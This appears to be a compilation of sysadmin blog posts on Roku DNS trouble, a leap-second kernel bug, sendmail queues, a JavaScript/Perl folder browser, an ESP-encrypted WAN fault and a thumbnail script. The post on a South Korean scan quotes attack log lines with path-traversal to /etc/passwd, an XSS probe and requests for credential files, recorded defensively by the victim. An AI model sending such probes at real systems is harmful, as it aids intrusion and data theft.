Categories
DNS IT Operational Excellence Network Technologies

The IT Detective Agency: Roku player can’t connect to Internet

Intro
I bought a used Roku player, just to try it out. Things didn’t go right at first.

The details
Setting it up, I got to the point where it tests its Internet connection. There are three status lights. The first two were OK, but the Internet connection returned an error, I think error #9. It didn’t matter whether I used a wired or wireless connection.

I have an unusual Internet router at home, a Juniper SSG5. All my other devices off that router were getting to Internet just dandy however. Long story short, it turns out that there was a slight DNS misconfiguration. The Juniper had itself as secondary DNS server. There was no primary DNS server. Why this only affected Roku is still a mystery.

I updated the Juniper config to use 4.2.2.3 as primary DNS server and the Roku connected just fine and it worked wirelessly as well.

Case closed!

Conclusion
Well, as a network type-of-guy, I would have appreciated access to the Roku Linux OS so I could have seen for myself what was going on. I’m sure I would have figured out the problem much sooner than I did. The error message was not particularly helpful and most of the online discussions attribute that problem to other causes than was the DNS issue discovered here. Short of OS access, more robust debugging tools, such as PING, would have been might handy.

Categories
Admin Security Web Site Technologies

DOS Attack from South Korea

Intro
Last week I witnessed a denial-of-service (DOS) attack against a web server. This is disconcerting to say the least. I felt by putting the information out in the open some leverage might be applied to the responsible party for that server or subnet.

The source of the attack was a single IP, 58.180.70.160.

Some Details
The attack occurred July 31st.

It consisted of over 100,000 object accesses.

I do not see evidence of an actual hack.

It lasted about 10 hours, from 12:30 PM EST to 10:57 PM, with some few preliminary accesses starting at 4 AM before the onslaught at Noon.

Clearly some kind of tool was used. It is very aggressive around forms, doing lots of variations in its POST to the same form, over and over. Here’s one small snippet that gives the flavor:

58.180.70.160 - - [31/Jul/2012:22:53:05 -0400] "POST /[omitted]/forgot_password.jsp../../../../../../../../../../etc/passwd/./././././././././././[pattern repeated - total URI is over 4000 characters!]

Then there’s the fishing around for files which I suppose if present may become a vector for attack, like these lines:

58.180.70.160 - - [31/Jul/2012:12:31:47 -0400] "GET /qlc9tjIqjR.cfm HTTP/1.1" 404 292 "-" "Mozilla/4.0 (compa
tible; MSIE 8.0; Windows NT 6.0)" "-" "-"
58.180.70.160 - - [31/Jul/2012:12:31:48 -0400] "GET /_vti_pvt/authors.pwd HTTP/1.1" 404 292 "-" "Mozilla/4.0
(compatible; MSIE 8.0; Windows NT 6.0)" "-" "-"
58.180.70.160 - - [31/Jul/2012:12:31:47 -0400] "GET / HTTP/1.1" 200 9491 "-" "Mozilla/4.0 (compatible; MSIE 8
.0; Windows NT 6.0)" "-" "-"
58.180.70.160 - - [31/Jul/2012:12:31:48 -0400] "GET /crossdomain.xml HTTP/1.1" 404 292 "-" "Mozilla/4.0 (comp
atible; MSIE 8.0; Windows NT 6.0)" "-" "-"
58.180.70.160 - - [31/Jul/2012:12:31:48 -0400] "GET /solr/select/?q=test HTTP/1.1" 404 292 "-" "Mozilla/4.0 (
compatible; MSIE 8.0; Windows NT 6.0)" "-" "-"
58.180.70.160 - - [31/Jul/2012:12:31:47 -0400] "GET /inexistent_file_name.inexistent0123450987.cfm HTTP/1.1"
404 292 "-" "<script>alert(12345)</script>" "-" "-"
58.180.70.160 - - [31/Jul/2012:12:31:47 -0400] "GET http://www.acunetix.wvs HTTP/1.1" 404 292 "-" "Mozilla/4.
0 (compatible; MSIE 8.0; Windows NT 6.0)" "-" "-"
58.180.70.160 - - [31/Jul/2012:12:31:47 -0400] "GET /index HTTP/1.1" 404 292 "-" "Mozilla/4.0 (compatible; MS
IE 8.0; Windows NT 6.0)" "-" "-"
58.180.70.160 - - [31/Jul/2012:12:31:47 -0400] "GET /server-info HTTP/1.1" 404 292 "-" "Mozilla/4.0 (compatib
le; MSIE 8.0; Windows NT 6.0)" "-" "-"
58.180.70.160 - - [31/Jul/2012:12:31:48 -0400] "POST /_vti_bin/shtml.exe?_vti_rpc HTTP/1.1" 405 124 "-" "Mozi
lla/4.0 (compatible; MSIE 8.0; Windows NT 6.0)" "-" "-"

The line mentioning Acunetix is I think a key to understanding this attack. I think it is leaving a cookie crumb trail to let the attacked site know what tool was used: Acunetix WVS Free Edition scanner.

So it’s a semi-legitimate tool, or at least one openly referenced by Google. But in the hands of a malicious or simply ignorant user, such a tool actually does become a DOS weapon. Its aggressive POSTs often have consequences for back-end databases. A medium-duty site is typically not tuned to handle 8,000 POSTS per hour, which is the rate they came in – over two per second. So the site can be tied up servicing these POSTs and not have resources left over to handle legitimate requests.

To get some background on where this originated from and by whom, I did a whois search on ARIN, the main Internet address space registry. This told me that that address space has been delegated to APNIC, the ASIA-Pacific NIC. So I did a Whois search on APNIC. That showed me that in fact that range is in turn delegated to Korea NIC! So it’s off to the KRNIC and their whois… That in turn gave me the most specific information of all:

More specific assignment information is as follows.
 
[ Network Information ]
IPv4 Address       : 58.180.68.0 - 58.180.71.255 (/22)
Network Name       : SHINBIRO-INFRA
Organization Name  : ONSE Telecom
Organization ID    : ORG2324
Address            : 2F Bundang Center, Onse IDC, 235-230, 
Zip Code           : 448-500
Registration Date  : 20081107
Publishes          : Y
 
 See the Contact Info
[ Technical Contact Information ] Name : IP Manager Organization Name : ONSE Telecom Zip Code : 448-500 Phone : +82-2-1666-0120 E-Mail : [email protected]
 
 
- KISA/KRNIC Whois Service -

Obviously it doesn’t get so specific that it tells me who owns the attacking host, but the mentioned subnet, 58.180.68.0/22 is not too big, all things considered, so that’s quite specific compared to where we were when we started our journey. It seems that its administered by ONSE Telecom in South Korea.

I tried to contact them by email – the email bounced. I also wrote to [email protected], which also bounced.

KRNIC is run by KISA, which claims to be an Internet security enterprise (fat chance in my book). I filled out their online contact form – it consistently failed to accept my message, no matter how simple I made it.

At this point I decided that this is too many offenses. The owners of that subnet, 58.180.68.0/22 are not playing by the rules of the Internet and they should be cut off from the Internet until they follow the rules.

So I set up rules to discard all packets from subnet 58.180.68.0/22 and I recommend that others do the same on their web sites.

Amazon Cloud not very sophisticated with regards to security
I initially tried to take my own advice and sought to put the above subnet into a deny security rule on my Amazon cloud service. I work with firewalls and this sort of thing is commonplace and been around for well over 15 years. But you can’t do it on the Amazon Cloud security service! I was shocked. They have so many sophisticated services and have clearly thought out this “cloud thing” better than just about anyone, but they didn’t stop to listen to customer requests on this basic security issue – a allow all but these subnets type of capability.

Conclusion
A DOS was observed emanating from a host in South Korea using Acunetix’s free WVS scanner. The owner of the subnet does not post legitimate contact information and should be banned from Internet connectivity for this egregious behaviour which was perpetrated using its address space.

Categories
Admin Linux SLES

The IT Detective Agency: A couple of our SLES servers are running very slowly

Intro
Sometimes truth is stranger than fiction, even in the IT realm. I actually had a mere supporting role in this case – credit must be given to my persistent and accomplished friends for finding the root cause.

This Unlikely case begins with a serendipitous accident
An incident accidentally gets assigned to me about a couple of application servers running slowly – the echo of command-line typing comes in fits and starts. Well, I quickly decide it’s not my issue and I look around to see who should handle it. Probably the network specialist, right? No other server is having this issue, and the servers with the issue are responding fine to PING on their local segment. But still, it sounds like a network problem. For instance an interface with duplex settings mismatched as compared to the switch port.

But I decide to be nice about it and approach the guy with the problem, “Freg,” and ask him what he thinks should be done with the ticket. He takes the opportunity to show me the problem in person. So I listen to his story and politely look. This took place on July 31st, mind you (yesterday). No one’s using theses servers until they tried today. They are too slow to use now. The last time they were used was about 50 days ago – they were fine then. There are two servers with a similar problem.

And it goes on like that. These are running an ERP app which starts a Java process. Both of these servers are VMs. So lots of facts are being thrown at me. Maybe some are relevant and some not. I have never heard of these servers and am not familiar with the app. No root access is available to us, but we can log on as the same user who runs the ERP app.

I do an uptime. It’s up 54 days. More imporantly, the load average is very high – 25 and pinned there because the 5- and 15-minute average is also around 25. I now feel comfortable explaining why the slow character-typing echo. So it’s not a network problem after all… Talk to a sysadmin is my advice. But he sits there expecting me to do more, to somehow offer something helpful…

So I hem and haw and do essentially the one thing I know how to do in these circumstances: run strace. I get the process number of the offending process and try to get some insight into what it’s spending its time on. I don’t do this very often, and when I do I usually don’t learn very much, but it is another piece of the puzzle: I have learned more than when I started out. Let’s say the process number was 26743, then I ran:

> strace -f -p 26743

and simply watched the output. The output was weird. It was filled with calls to a function I’ve never seen before: futex. In fact it was all futex calls, looping, rapidly, and the same calls, producing timeout errors.

You can look in section 2 of the man pages:

> man -s2 futex

on a Linux system and see for yourself that futex is the Fast userspace locking system call. Don’t ask me. I’d say it’s a kernel thing. But it intuitively doesn’t seem right that a program would be using excessive amounts of CPU doing nothing but this one system call. A more healthy program will be seen making a nice variety of calls, especially and usually TCP-related ones like open, read, socket, gethostbyname, etc.

A popular cause ruled out
I also checked out /etc/resolv.conf. It’s often that a sysadmin messes that file up with an invalid nameserver, or even, just the other day, a nameserver line that omitted the nameserver directive and only contained the IP address of the nameserver! The symptom of that is different. The initial login prompt comes slowly (as it times out doing a reverse lookup on your source IP address), but character echo after that is normal.

The leap second
Other ideas for isolating the problem: reboot, but turn off this process at start-up. I think the reboot did help. But our sysadmin found that in fact this is a known issue on Suse Linux (SLES).

From we learn that a leap second was added June 30th, 2012, and there is a problem associated with it. It “can cause applications that are using FUTEXes to consume 100% of CPU. The issue is present in all Linux kernel versions >= 2.6.22, therefor affecting SLES 11 SP1 and later releases.” Wow!

The remedy in that case is to execute the command

$ date -s “$(LC_ALL=C date)”

to trigger a clock_was_set() system call. We did this and it seems to have fixed our issue.

Case closed.

Conclusion
The best sleuthing involves multiple people looking at things. Sometimes their individual breakthroughs need to be combined. Here the incidental observation of futex calls helped associate a cpu problem to a kernel bug related to a leap second implementation. This also explains why the problem did not exist 50 days ago – that was before June 30th.

Categories
Admin Internet Mail Linux

Yahoo! stopped accepting emails – what we can learn about sendmail from this

Flash Update
I noticed yahoo.com, yahoo.ca and yahoo.com.br had stopped accepting emails today.

I wanted to provide insight into this problem that few others would have, namely, when did the problem first occur?

I looked at my stuck messages in queue. I realized that with sendmail, there is no easy way to answer the question: what is the oldest stuck message for domain XYZ in the queue? So I rigged up something, very crude, but typical for a Unix command line-type of guy.

Namely:

$ grep yahoo */qf*|grep for|cut -d\; -f2|sort|head

The answer? My first stuck message comes from 12:43:46 EST today (July 31st). As of this writing, 3:53 PM, the problem still exists, which already makes it a quite long outage even if it is fixed in the next few minutes. Just minutes later, around 4 PM, I noticed a lot of the messages being delivered, so the problem seems to have finally cleared up.

The expression above works if you are root and the current directory is, e.g., /mqueue, under which you have queue directories q0, q1, …, q9, etc corresponding to an MC statement:

define(`QUEUE_DIR',`/mqueue/q*')dnl

The grep above might miss a few messages, but if you have lots of them as I do, it doesn’t really matter as it’s purpose is just to convey the general idea of when the problem started. In my case it can be safely assumed that I am continuously sending emails to yahoo.com, so it is not possible to have a window that isn’t covered of more than ten minutes or so during the day.

Conclusion
We helped document a complete three-hour outage of Yahoo mail. Along the way we learned of a deficiency in sendmail’s mailq command – how limited its reporting options are. We compensated for that by rolling our own series of commands to answer the question of what is the oldest mail of this type in our queues.

Categories
JavaScript Linux Perl

A simple Perl script to build JavaScript folder objects

Part 2
Intro
This is the 2nd part in a two-part blog where I present a simple example of a JavaScript folder browser. In Part 1 I provided all the JavaScript required. By itself it may have seemed an academic exercise, but once you appreciate that it isn’t hard to write a program which creates the JavaScript objects from your server’s directory structure, well, now you have something that’s pretty powerful and useful.

The details
I considered writing this in Python, which seems to be a more current language, but old habits die hard as they say. I just know Perl too well to suffer the pain of learning all those neat tricks all over again in another language. Maybe someday I’ll re-write it in Python.
Notice the recursion through the directories? I first used that 17 years ago! Why throw out good code?

Here is the code, which I named scan.pl:

#!/usr/bin/perl
# DrJ - 7/2012
# scan picture-containing directories using recursion and build javascript objects from them
use Getopt::Std;
getopts('d:j:');
$homedir = $opt_d;
$jsfile = $opt_j;
usage() if ! $opt_d || ! $opt_j;
$DEBUG = 0;
print "Homedir: $homedir, jsfile: $jsfile\n";
open(JS,">$jsfile") || die "Cannot open JavaScript file: $jsfile!!\n";
$date = `date +%D`;
($homedirnoslash) = $homedir =~ /^\/(.+)/; # assumes leading "/"
 
# print opening of function
print JS qq#function init() {
// Generated data from scan.pl - DrJ $date
folder['browse'] = {path:'',depth:0,kids:['$homedirnoslash']};
#;
 
# get things going with our recursive function
traverse($homedir,0);
 
# closing statement
print JS qq(}\n);  # close of init JavaScript function
close(JS);
 
sub traverse {
my ($dir,$depth) = @_;
my @kids = ();
print "Traverse. dir: $dir\n" if $DEBUG;
opendir(DIR, $dir) || die "Cannot open dir $dir!!\n";
foreach (readdir(DIR)) {
  next if $_ eq '.' || $_ eq '..';
  print "Traverse. file: $_\n" if $DEBUG;
  $path = "$dir/$_";
  if (-d $path) {         # a directory
# we want only the last part of the path
    (my $lastpath) = $path =~ /([^\/]+)$/;
    push(@kids,$lastpath);
    traverse($path,$depth + 1); # recurse!
  } elsif ($_=~/$filespec/) {        #
  }
} # end loop over files in this directory
# write out the JS objects
print JS qq(folder["$dir"] = {path:"$dir",depth:$depth,kids:[);
my $i = 0;
# kids are in jumbled order.  Do regular sort on them.
foreach (sort @kids) {
  $comma = $i++ > 0 ? "," : "";
  print JS qq($comma"$_");
}
# end of object. close it out.
print JS qq(]};\n);
} # end sub traverse
#
sub usage {
  print "usage: $0 -d root_directory -j JavaScript_output_file\n";
  exit(1);
}

It’s pretty self-explanatory. Call it like this example:

> ./scan.pl -d /homepic -j init.js

and it produces an init.js file filled with an init() function and all the necessary folder objects, assuming the top-level folder to browse is /homepic.

My init.js looks like this:

function init() {
// Generated data from scan.pl - DrJ 07/27/12
 
folder['browse'] = {path:'',depth:0,kids:['homepic']};
folder["/homepic/pictures_chronological/2011_06"] = {path:"/homepic/pictures_chronological/2011_06",depth:2,kids:[]};
// lots more lines like this omitted
folder["/homepic"] = {path:"/homepic",depth:0,kids:["kodak_pictures","pictures_chronological"]};
}

And I tested it in browse13.html, which looks just like browse12.html, except I got rid of the init() function and added an include line at the top:

<html>
<head>
<script type="text/javascript" src="init.js"></script>
...

I am a little concerned about performance. This clearly isn’t designed to scale to tens of thousands of directories, but will it be sufficiently fast for my purposes? My init.js is 213 lines and about 25 KB in size. browse13.html which calls it loads fast and runs fast. So, yes, success!

Part 1, A Simple Javascript Folder Browser

Conclusion
We have created a fairly powerful and general-purpose folder browser out of fairly simple usage of JavaScript and Perl. It makes an ideal base upon which to build further.

Categories
Apache JavaScript Perl

A Simple Javascript Folder Browser

Part 1

Intro
I haven’t posted much lately. I’ve been tied up creating this folder browser using client-side JavaScript. I probably made every mistake in the book, but I worked through them all and the outcome is pretty cool, if I say so myself! It works in IE, FireFox and even Blackberry!

The details
I broke down the development of this browse app into 12 stages. Given time, I might show the progression of my thinking as each version becomes closer and closer to fulfilling all initial objectives. But who has time? I’ll show the source for browse3.html, warts and all, and then skip many iterations and jump to showing the final source, browse12.html.

Browse3.html
It ain’t pretty. It isn’t even correct. But it “does stuff.” It assumes Apache web server is running and “borrows” the closed and open folder icons from apache’s /icons directory. In my case I have a top-level directory called /homepic with folders under that and sub-folders under those folders that I want the ability to browse and , ultimately, take some action such as displaying all the folder’s images in the image viewer I wrote earlier.

<!DOCTYPE html>
<html>
<head>
<script type="text/javascript">
// global object
var folder = new Object;
function displayDate()
{
document.getElementById("demo").innerHTML=Date();
}
function init() {
// big initialization - generated code from perl perusal of directories
// see http://www.quirksmode.org/js/associative.html
//  var folder = new Object;
// we need this empty assignment to extend object with subproperties later on
  folder['homepic'] = '/homepic';
  //folder['/homepic'].path = '/homepic';
  folder.homepic.state = 'closed';
  folder[0] = '/homepic/kodak_pictures';
  folder[1] = '/homepic/pictures_chronological';
  folder['/homepic/kodak_pictures'] = '/homepic/kodak_pictures';
  folder['/homepic/kodak_pictures'].state = 'closed';
  //folder['/homepic/kodak_pictures'].path = '/homepic/kodak_pictures';
  folder['/homepic/pictures_chronological'] = '/homepic/pictures_chronological';
  folder['/homepic/pictures_chronological'].state = 'closed';
  //folder['/homepic/pictures_chronological'].path = '/homepic/pictures_chronological';
  var child = 'homepic';
  var cstate = folder['homepic'].state;
  var cpath = folder[0];
}
function browse(f) {
document.getElementById("demo").innerHTML="folder: "+f+" ";
var icon;
var imgid;
var fname;
if (f == "browse") {
// see http://www.quirksmode.org/dom/intro.html#create
// one-time initialization
  init();
  document.getElementById("browse").innerHTML='';
  icon = document.createElement('IMG');
  icon.src = "/icons/folder.gif";
  icon.id = "icon-/homepic";
  icon.onclick = Function('browse("/homepic")');
  document.getElementById("browse").appendChild(icon);
  var divfolder = document.createElement('DIV');
  divfolder.id = "/homepic";
  document.getElementById("browse").appendChild(divfolder);
  var x = document.createTextNode('homepic');
  document.getElementById('/homepic').appendChild(x);
  //document.getElementById("browse").innerHTML='<img id="homepic" onclick="browse(\'homepic\')" src="/icons/folder.gif">ho
mepic<br>';
} else {
  imgid = 'icon-' + f;
// change img to one of open folder
  document.getElementById(imgid).src = "/icons/folder.open.gif";
  // nope? imgid.src  = "/icons/folder.open.gif";
  for (i=0;i<3;i++) {
    icon = document.createElement('IMG');
    icon.src = "/icons/folder.gif";
    fname = folder[f].children[i];
    //fname = folder['homepic'].children[i];
    icon.id = "icon-" + fname;
    icon.onclick = Function('browse('+fname+')');
    document.getElementById(f).appendChild(icon);
    var divfolder = document.createElement('DIV');
    divfolder.id = fname;
    document.getElementById(f).appendChild(divfolder);
    var x = document.createTextNode(fname);
    document.getElementById(f).appendChild(x);
  } // end loop over children
}
}
// note variable # or arguments are being passed
function  openfolder()
{
var f = arguments[0];
var dir = "/icons/";
var fopen = "folder.open.gif";
var fclosed = "folder.gif";
var folder = document.getElementById(f);
var ftype = folder.src;
// src includes http... Get rid of stuff in front
var patt = /.*(folder.+)/;
var ftypebare = ftype.replace(patt,"$1");
// for debugging
document.getElementById("demo").innerHTML="folder: "+f+" "+ftypebare;
if (ftypebare == fopen) {
// close folder and remove sub-folders
  folder.src = dir+fclosed;
  document.getElementById("homepic/pictures_chronological").innerHTML='';
} else {
// open up folder and reveal sub-folders
  folder.src = dir+fopen;
  for (var i = 0; i < arguments.length; i++) {
    var placeid = arguments[i];
    var srcid = '/' + placeid;
    document.getElementById(placeid).innerHTML='&nbsp;&nbsp;&nbsp;<img id="' + srcid + '" onclick="openfolder(\'pictures_ch
ronological\')" src="/icons/folder.gif"/> pictures_chronological<br>';
  }
}
 
}
</script>
</head>
<body>
 
<h1>Folder Browser</h1>
<p id="demo">Debug Aid.</p>
<p id="browse"><a href="#" onclick='browse("browse")'>Folder Browser</a></p>
 
<img id="homepic" onclick="openfolder('homepic','homepic/pictures_chronological','homepic/canon_pictures')" src="/icons/fol
der.gif"/> homepic<br>
<div id="homepic/pictures_chronological"></div>
<div id="homepic/canon_pictures"></div>
<img id="cfolder2" onclick="openfolder(2)" src="/icons/folder.gif"/><br>
<img id="cfolder3" onclick="openfolder(3)" src="/icons/folder.gif"/><br>
<img id="cfolder4" onclick="openfolder(4)" src="/icons/folder.gif"/><br>
 
</body>
</html>

So you see in browse3 I’m wrestling with how to work with JavaScript Objects (which I didn’t really know existed at that time). I badly wanted to give an associative array properties, as in the initialization line

folder['/homepic/kodak_pictures'].state = 'closed';

but I couldn’t find any examples on the Internet. I eventually learned that wasn’t a correct assignment.

So one of my biggest and most worthwhile lessons was to gain a decent understanding of JavaScript objects, which hold multiple values, and object properties.

I tried to use Firebug for Firefox, with very limited success, but at least I could step through the Javascript code and see which branch in a conditional was being executed compared to what I thought should be executed, which tipped me off to one vexing problem concerning opening and closing folders multiple times. Also just looking up the error in Internet Explorer by double-=clicking the warning sign in the corner was tremendously helpful.

So…skipping for now versions 4 – 11, we arrive at browse12.html:

Browse12.html

<!DOCTYPE html>
<html>
<head>
<script type="text/javascript">
// global object
var folder = new Object;
function displayDate()
{
document.getElementById("demo").innerHTML=Date();
}
function init() {
// big initialization - generated code from perl perusal of directories
// I think my big breakthrough was to learn about Javascript objects and their properties
// from the book Javascript The Definitive Guide, 5th edition by D.Flanagan
// Some additional inspiration came from http://www.quirksmode.org/dom/intro.html#create
// folder is an associative array with properties path, state,depth and kids (which is itself an array)
// first entry is initial top-level to get things started
  folder['browse'] = {path:'',depth:0,kids:['homepic']};
// regular entries:
  folder['/homepic'] = {path:'/homepic',depth:1,kids:['kodak_pictures','pictures_chronological']};
// values for sub-folders
// /homepic/kodak_pictures
  folder['/homepic/kodak_pictures'] = {path:'/homepic/kodak_pictures',depth:2,kids:['2002_05','2002_06']};
// /homepic/pictures_chronological
  folder['/homepic/pictures_chronological'] = {path:'/homepic/pictures_chronological',depth:2,kids:['2011_11','2011_12']};
}
function browse(f) {
document.getElementById("demo").innerHTML="folder: "+f+" ";
var icon;
var imgid;
var fname;
var table;
if (f == "browse") {
// one-time initialization
  init();
}
 
imgid = 'icon-' + f;
if (!folder[f]) {
// folder not defined: must be a terminal folder. Do something here eventually
// but for now do nothing whatsoever
} else {
  if (folder[f].state === undefined || folder[f].state == 'closed') {
  // change img to one of open folder
    if (f == 'browse') {
      document.getElementById(f).innerHTML='';
    } else {
      document.getElementById(imgid).src = "/icons/folder.open.gif";
    }
    var kids = folder[f].kids;
    for(var i=0;  i < kids.length; i++) {
      table = document.createElement("table");
      table.border = 0;
      var row = document.createElement("tr");
      var td1 = document.createElement("td");
      var td2 = document.createElement("td");
      var td3 = document.createElement("td");
      icon = document.createElement("img");
      icon.src = "/icons/folder.gif";
      if (f == "browse") {
        fname = "/" + kids[i];
      } else {
        fname = f + "/" + kids[i];
      }
      icon.id = "icon-" + fname;
      if (folder[fname])
        folder[fname].state = 'closed';
      icon.onclick = Function('browse("'+fname+'")');
      td1.width = 27 + folder[folder].depth*27;
      td1.align = "right";
      td1.appendChild(icon);
      var node = document.createTextNode(kids[i]);
      td3.appendChild(node);
      row.appendChild(td1); row.appendChild(td2); row.appendChild(td3);
      table.appendChild(row);
      document.getElementById(f).appendChild(table);
      var divfolder = document.createElement("div");
      divfolder.id = fname;
      document.getElementById(f).appendChild(divfolder);
      folder[f].state = 'open';
    } // end loop over children
  } else {
  // set folder to closed state
  // this innerHTML nullification is kind of a kludge, but it works
    document.getElementById(f).innerHTML='';
    document.getElementById(imgid).src = "/icons/folder.gif";
    folder[f].state = 'closed';
  } // end conditional over folder state
} // end condition over whether folder is defined or not
} // end function browse
 
</script>
</head>
<body>
 
<h1>Folder Browser</h1>
<p id="demo">Debug Aid.</p>
<p id="browse"><a href="#" onclick='browse("browse")'>Folder Browser</a></p>
</body>
</html>

That’s it! Not bad, huh? I pan to generate the init() function periodically and automatically from a Perl script which peruses my directories.

I could have used Ajax and generated the subfolder information on the fly as it is needed – not that I know how, I just know enough to know it is possible and therefore I could do it – but I thought this method of pre-loading all the information might be a little more efficient. If this were a folder and file browser it would be different, but for now it is just a folder browser.

So the main revelation is that I had to set my associative array members to be objects during initialization, as in

folder['/homepic'] = {path:'/homepic',depth:1,kids:['kodak_pictures','pictures_chronological']};

and one of the object values is itself an anonymous array that holds the sub-folders.

Buying an actual book was probably a good move. I went with JavaScript, The Definitive Guide, 5th edition. Note that this is not the latest edition – the 6th – but this way I could buy the book used for a lot less and not get myself further confused by HTML5, which I am not ready to tackle and which many browsers do not yet fully support. The book is pretty heavy going and the discussion of DOM was particularly difficult and the examples too few and too removed from the real world. But the Core Javascript discussion made a lot of sense to me so was by itself worth the purchase price.

In my next post I’ve posted the Perl script which can generate the folder object initialization.

Part 2, A simple Perl script to build JavaScript folder objects

Conclusion
In this part one of a two-part post I’ve provided the JavaScript that implements a very compact folder browser. It has been tested on both IE and Firefox. The 2nd part of this series will provide the Perl Jvascript code generator for automation of the object creation.

Categories
Admin Network Technologies

The IT Detective Agency: Two of our sites got cut off!

Intro
I sometimes consult for the networking group of a large company. This incident really happened. I don’t know that it could ever happen again to anyone else, but it’s so bizarre that I just had to document it as an example of “you wouldn’t believe it unless you had actually been through it yourself.”

Let’s get into it
This company has lots of small and mid-sized offices connected via MPLS. WAN services are provided by a single telecom throughout the country. I feel obliged to not divulge specifics here. Let’s call the telecom “OE” as in over-extended.

So just before lunch yesterday they tell me that no PCs at one of their sites can access Internet, and this information is coming from a very reliable source. It also comes out that a second site is similarly affected. It kind of sounds like a WAN problem, but no other sites are affected. In the old days you’d almost certainly know to look at the WAN, but these days it’s a little more complicated. Everyone’s PC is in AD and they have the ability to push a GPO to all PCs at a site, so you just never know if the desktop group wasn’t involved in messing them up.

So they tell me they can PING their corporate Intranet server. Fine. But they cannot telnet to port 80. Newsflash. How did they get telnet enabled in Windows 7? I mentally stored this question for my continuing education. Crises are also great learning/teaching moments if you are of that frame-of-mind!

Ping is good. Of course I test the Intranet server myself, iwww.intranet. I can reach port 80 just fine. It happens that the front-end for iwww.intranet is a load balancer. I decide to do a trace using tcpdump. I’m not sure what I’ll find, but taking a trace is sort of a gut reaction in these cases. There’s lots of other traffic so we have to use a filter to see the tree in the forest. They give me the IP of the PC they’re testing from. My expression is something like this:

> tcpdump -i 0.0 host WKSTATION.AD.INTRANE

The 0.0 on this particular device is its way of saying use any and all interfaces.

Here’s what the output looks like:

11:51:03.852511 IP WKSTATION.AD.INTRANET > iwww.intranet: ESP(spi=0xd7ca145d,seq=0x3de0a5), length 100
11:51:05.855446 IP WKSTATION.AD.INTRANET > iwww.intranet: ESP(spi=0xd7ca145d,seq=0x3de101), length 100
11:51:06.187940 IP WKSTATION.AD.INTRANET > iwww.intranet: ESP(spi=0xd7ca145d,seq=0x3de10b), length 100
11:51:08.857957 IP WKSTATION.AD.INTRANET > iwww.intranet: ESP(spi=0xd7ca145d,seq=0x3de16d), length 100
11:51:09.184072 IP WKSTATION.AD.INTRANET > iwww.intranet: ESP(spi=0xd7ca145d,seq=0x3de179), length 100
11:51:09.858865 IP WKSTATION.AD.INTRANET > iwww.intranet: ESP(spi=0xd7ca145d,seq=0x3de198), length 100
11:51:14.855327 IP WKSTATION.AD.INTRANET > iwww.intranet: ESP(spi=0xd7ca145d,seq=0x3de272), length 100
11:51:15.183349 IP WKSTATION.AD.INTRANET > iwww.intranet: ESP(spi=0xd7ca145d,seq=0x3de27f), length 100
11:52:19.898380 IP WKSTATION.AD.INTRANET > iwww.intranet: ESP(spi=0xd7ca145d,seq=0x3decab), length 100
11:52:22.901684 IP WKSTATION.AD.INTRANET > iwww.intranet: ESP(spi=0xd7ca145d,seq=0x3ded28), length 100

I had never seen that before. I loop up ESP and see it is related to IP protocol 50 which in turn is used in IPSEC for VPN connections.

What the…?

Yeah. Let’s review. He’s sending TCP packets to port 80 of iwww.intranet and all I’m seeing are these ESP packets, which isn’t even TCP. Of course the load balancer has no idea whatsoever what to do with those packets and simply does not respond to them.

What would you do? I felt the nail in the coffin would be to take a trace on the PC itself – see how the packets are when they’re coming straight out of the PC. But to be honest they never did make that trace. They didn’t have Wireshark installed so it would take awhile.

Meanwhile, the infrastructure folks are talking to each other and someone mentions the OE has a certain project “runVPN” that thay’re rolling out. Now that sounds suspicous. In the imperfect world you have to work with what you have, not what you’d like to have. Based on our experiences and educated hunches, we now feel pretty certain it’s gotta be a WAN problem caused by OE.

Within an hour OE confirms the problem is of their creation, and they have it fixed. They are very unhappy with the tech who caused it.

Conclusion
Sometimes things are what they appear to be. If you notice I didn’t do much to really help with the issue, and that’s all just about anyone can do when so much is outsourced. They did feel that my trace helped to convince the telecom that this really was their issue.

I guess they were encrypting WAN traffic on one end, but forgot to decrypt it on the other end. One of the strangest things to have on a production network.

Turning on telnet in Windows 7
Did I mention that they tested with telnet on Windows 7? They later explained how to enable it. Go to control panel / Programs / Programs and Features / Turn Windows features on. There is an option for Telnet client. Reboot (yes, you really need to reboot for this to take effect) and you’re good to go.

Categories
Admin Ajax Image Manipulation Web Site Technologies

How to create a Progressive Scrolling Web Gallery

Intro
I know, I know, there are thousands of ways to display your pictures on the web. I did a 60 second search and settled on one approach that looked interesting to me. Then I quickly ran into some limits and made some improvements. That’s why there are now thousands plus one more as of today! The app I improved upon is good for previewing pictures in a directory where there are lots of nice pictures. It makes the downloading more pleasant and shows large-ish thumbnail images that can be enjoyed in their own right while you wait for more images to download.

Thankyou Alexandru Pitea
So I just downloaded the stuff from his fine tutorial, How to Create an Infinite Scrolling Web Gallery. I unpacked his the downloaded zip file: worked first time. That’s a good sign, right? That doesn’t always happen. Then I started to make changes and ruined it.

As previously documented I use Goodsync to sync all my home pictures to my server. So all pictures are present in various folders. But they’re big. I needed thumbnails for this gallery app. I wrote a very crude thumbnail generator. I basically have to edit it each time I work on a different directory. One day I’ll fix it up. I call it createthumbs.php:

<?php
function createThumbs( $pathToImages, $pathToThumbs, $thumbWidth )
{
  // open the directory
  $dir = opendir( $pathToImages );
 
  // loop through it, looking for any/all JPG files:
  while (false !== ($fname = readdir( $dir ))) {
    // parse path for the extension
    $info = pathinfo($pathToImages . $fname);
    // continue only if this is a JPEG image
    if ( strtolower($info['extension']) == 'jpg' )
    {
      echo "Creating thumbnail for {$fname} <br />";
 
      // load image and get image size
      $img = imagecreatefromjpeg( "{$pathToImages}{$fname}" );
      $width = imagesx( $img );
      $height = imagesy( $img );
 
      // calculate thumbnail size
      $new_width = $thumbWidth;
      $new_height = floor( $height * ( $thumbWidth / $width ) );
 
      // create a new temporary image
      $tmp_img = imagecreatetruecolor( $new_width, $new_height );
 
      // copy and resize old image into new image
      imagecopyresized( $tmp_img, $img, 0, 0, 0, 0, $new_width, $new_height, $width, $height );
 
      // save thumbnail into a file
      imagejpeg( $tmp_img, "{$pathToThumbs}{$fname}" );
    }
  }
  // close the directory
  closedir( $dir );
}
// call createThumb function and pass to it as parameters the path
// to the directory that contains images, the path to the directory
// in which thumbnails will be placed and the thumbnail's width.
// We are assuming that the path will be a relative path working
// both in the filesystem, and through the web for links
createThumbs("img/2012_05/","thumb/",200);
?>

Notice these are pretty big thumbnails – 200 pixels. That’s how the gallery program works best, and I think it is a good size for how you will want to browse your pictures.

Then I moved the original img directory to img.orig and made a symbolic link to one of my pictures’s folders (which I had run through the thumbnail generator).

img -> /homepic/pictures_chronological/2012_05/

